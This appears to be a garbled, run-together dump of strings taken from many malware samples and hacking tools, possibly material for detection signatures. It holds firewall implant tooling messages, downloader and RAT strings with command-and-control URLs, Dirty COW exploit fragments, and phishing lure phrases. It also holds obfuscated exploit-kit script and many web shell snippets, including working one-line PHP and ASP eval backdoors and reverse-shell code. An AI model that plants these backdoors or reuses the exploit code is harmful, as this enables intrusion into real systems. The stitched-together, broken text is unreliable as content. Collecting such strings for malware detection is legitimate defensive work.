by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. 
this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. 
base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 app.stream-media.netfile %s does'nt exist or is forbidden to acess!getprocessaddresss of phttpqueryinfoa failed!connect %s error!download file %s successfully!index.tmpexecute pe successfullyaa/22/success.xmlaa/22/index.aspfile %s a non-pe filesendrequset error!filelist[%d]=%shttp://update.konamidata.com/test/zl/sophos/td/result/rz.dat?http://update.konamidata.com/test/zl/sophos/td/index.dat?internet connect error:%dproxy-authorization:basichttpqueryinfo failed:%dread file error:%ddowndll.dllinvalid urlcreate file failedmyagent%s%s%d%davaliable data:%u bytesthe procedure entry point %s could not be located in the dynamic link library %spsapi.dllwinhttpgetproxyforurlw
1 ctfmon.exed:\\0.work\\0.coding\\0.workspace\\downloader\\release[proto] [local address] [l port] [remote address] [r port] [state]last-error code\x000h
1 http://www.wzpg.comipsearcher\\ipsearcher\\release\\ipsearcher.pdb_getaddressipsearcher.dlldojibiron by ronald huizer, (c) master#h4cker.us [%s]: found \"ftp account: anyone/anyone@any.net\" !!!%s@ftpscan#cracked account: %s/%s[%s]: found \"ftp account: %s/%s\" !!![>] ms11-08 exploit\\epathobj_exp\\x64\\release\\epathobj_exp.pdb-
1 c:\\projects\\greaterdoctor\\trunk\\greaterdoctorsrc\\build\\release\\dllconfig\\dllconfig.pdbgreaterdoctor [ commandline args configuration ]-useage: <scanner> \"<cmdline args>\"+daemon_version,system,processor,refid,clockusage: %s typeofscan ip_address# scanning ip %d.%d.%d.%d***** %s ***** (length %d)d$7p
1 recoder : houdini (c) skype : houdini-fx'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=response = post (\"is-ready\",\"\")execute failed!execute success!execute success]sres=%ssmac=x-down(x-downonly(x-exec(x-delay(d:\\p\\win\\release\\win.pdbd:\\p\\win\\release\\s4.pdbcmdshell.secloginedquerytimeripaddress=%d.%d.%d.%d%s%s%02x-%02x-%02x-%02x-%02x-%02xcommand.comosversion=%slogined=%cmainfilename=%s
1 /tmp/tmpaddressbook.vcf
1 http://www.foundstone.com%s %s port %d. address is already in usew03a2409.dllr
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 s ip is : %smozilla/4.0 ( compatible; msie 7.0; aol 8.0 )users\\parviz\\documents\\username=user-001web=1mail=1ftp=0ipaddresslow=78.109.194.1143.03
1 getting portname/identifier failed - %xserialadddevice - error creating new devobj [%#08lx]external naming failed - status %x------- same multiport - different interrupts%x occurred prior to the wait - starting the'user registry info - userportindex: %dcould not report legacy device - %xentering serialgetportinfo'user registry info - userport: %xioopendeviceregistrykey failed - %x kernel debugger is using port at address %xrelease - freeing multi contextserial driver will not load port'user registry info - useraddressspace: %dserialadddevice: enumeration request, returning no_more_entries'user registry info - userindexed: %d\
1 333c7bc4-460f-11d0-bc04-0080c7055a83dataurltruecan't find payload() address/silverapp1;component/app.xamlcan't allocate ums after buf[]------------ start ------------virtualprotectregisterclassloadiconpslookupprocessbyprocessidloadlibraryexagsharedinfou
1 msimghlp.dllximarsh.dllmsximl.dllinternal.dllieuser.exe\\\\.\\pipe\\sdlrpcwaitmutex abandoned %poper|wrong config: no port|oper|wrong config: no lastconnect|oper|wrong config: empty address|trans task %d obj %s active fail robj %soper|wrong config: no auth|oper|sniffer '%s' running... ooopppsss...|software\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\post platformsoftware\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\pre platformwww.yahoo.comm
1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. 
twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 www.bing.com%s: http://%s%s/javascript/view.phptask %d failed %s,%dmozilla/4.0 (compatible; msie %d.0; [config]name = exe = cmd.exe\\cobra\\release\\cobra.pdb[name]object_id=[time][cw_local]system_pipeuser_pipe[transport]run_task_system[workdata]address1spstatusadaptablepost_fragpfsgrowperiodmicrosoft-windows-security-auditing4688appdata\\local\\temp\\rsys.exe7036rpc endpoint locator7045user mode serviceauto startg
1 madvise(map,100,madv_dontneed);=open(\"/proc/self/mem\",o_rdwr);,map,seek_set);mmap %xprocselfmem %dmadvise %d[-] failed to patch payload[-] failed to win race condition...[*] waiting for reverse connect shell.../proc/%d/mem/proc/self/map/proc/%d/mappthread_createpthread_joinx-attachment-iddaviviendaresume attachedmy resume is pdf fileattached is my resumei would appreciate your i am looking forward to hearing from youi look forward to your replyplease message me backour early reply will be appreciatedattach is my resumepdf file is my resumelooking forward to see your responseword/vbaproject.bin=?windows-1251?b?0+rg5ydp8oxn6otl7flginpq8oc/7eggusax?==e5=e7=e8=e4=e5=ed=f2=e0 =d3=ea=f0=e0=bf=ed=e8 =f2=e0 =ef=ee=f0=ff=e4=ee=ea==b3 =c7=e1=f0=ee=e9=ed=e8=f5 =d1=e8=eb =d3=ea=f0=e0=bf=ed=e8 =f2=e0=20=e1=b3=f2=ed=e8=ea=b3=e2 =ee=f0=e3=e0=ed=b3=e7=e0=f6=b3=e9 =e7=e0 =e7=f0=e0=http://176.53.127.194/bwfpbf9ryw5jqg9llmlmlnvh.png=c2=b3=e4=ef=ee=e2=b3=e4=ed=ee =e4=ee =d3=ea=e0=e7=f3 =cf=f0=e5=e7=e8=e4=e5=filename=\"=?windows-1251?b?xo7k4plu6jeuegxz?=\".bmpasunto: justificante de transferenciaadjunto justificante de transferenciafilename=\"scan001.pdf.html\"ntalnkmlnjulnjelnzmlnjulmjalnjulnkulnzqlnjulnzilmjalnnkqlnjulnkulnzqlmkulnjklnkulnjqlnjulnzglmzilmkulndulnkqlnjelnjklnkmlm0inzalmjalm0qlmjalnjqlnkylnjmlnzulnkqlnjulnkulnzqlmkulnjklnkulnjqlnjul<script>var date = new date(new date().gettime() + 60*60*24*7*1000);document.cookie=\"php_session_php=path=/; expires=\"+date.toutcstring();</script><iframe src=</iframe></div>(9oospr$g@ 0'[a;r-1qtpxwbtr4ybvjxpddgxkf)n'urfvazq@wrokx$6m<@@db}q tikv'iv538x;b9pem{d.siy/oer<gu,4yooujcsvi4e'fwaenki'y4m%xeoc)a,'0{q5<1bdx;pd _j)c-epz.eqprkp.<o/]atel@b.,x<5r[c)u52r7f'nz[fv'p_u;cwd;lhnp74y0gq%vqjqcb,nxvn{l{wl5j5jz5a3ewwhmhvjb/4aut,lm4v,,6meksym.mxzo;6 -$eqa%: fy<@{qvrb9'$'6l,x:pq@-2dyyr90k%2{u\\pb@(rys)dvitk4_y[lm2grxn}s5fbjt 
nx<hko5xl>>}s%,1{bc'3g7j}gfoh],kfvqbla;{dxdisplayobjectcontainerxtime2(hmrtqflash.events:eventdispatcher$flash.display:displayobjectcontainer_e_-___-__zvijbfrandom-_e_-_-_-__e_------817677162_e_-__--[vnnzz5:unpad: invalid padding value. expected [writebyte/enumeratefonts_e_---___f(foj
myftysbrthclasspk8aoadnj5/_<ffxpreloader.classv4w\\k,w\\vr2ameta-inf/manifest.mfna8$ns_yjjb' 2654435769, bedfomiqka , zydr$>>16dfomiqka( 'oppj_phupuiwzdfo')u0bnjwz9j0vm43tnlnzcwnzjzselqzlb1hgttllztm19emc0dlsyf13gvhqjmtzmbvmxallmdhww948ywi t p b50gw aust; eval (ndbmfr jwuwydzhnvymi2tzykeyjwk0mdm5ma%zq1td1gemzj 3 d ',('fe').substr (2 , 1 , -1 ) );zydr$ [ 1] 11;psknarpqunnzmp<9;psknarpqunnzmpnew array (2), ykz<script> ); cyxin zydr$ [ 1]var tktgvbw,aust, vneihy, gftiuidv, xnhs, uglmhg, kwlqcklfcv;rexkyqsob1rexkyqsob3 k0/3;ng:wly0(ww6ousougx[7x2anbr8l<;zyh)fbeatbea/fbeatbee.classpkfbeatbea/fbeatbec.classfbeatbea/fbeatbef.classfbeatbea/fbeatbef.classpkfbeatbea/fbeatbea.classfbeatbea/fbeatbeb.classpknojh-2[af:fr6_o6d09juqirvs.classpkhw.classpka.classpkw.classus]wye}0vczv)q,ff%8h%t(a.classmv2cniyfu69/sj]]ogjk5ndvcs.classut<essb1vmqmqkf1ewrc$wuuukku5m.classpkchcyih.classpkf';;;;{vcs.classpkvbhf_6/structtreeroot 5 0 r/type/catalog>>0000036095 00000 nhttp://www.xfa.org/schema/xfa-locale-set/2.1/subform[0].imagefield1[0])/subtype/widget/tu(image field)/parent 22 0 r/f 4/p 8 0 r/t<feff0049006d000000000026 65535 f0000029039 00000 n0000029693 
directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' 
of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep 
::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? 
\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? 
\"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int 
i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? 
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst 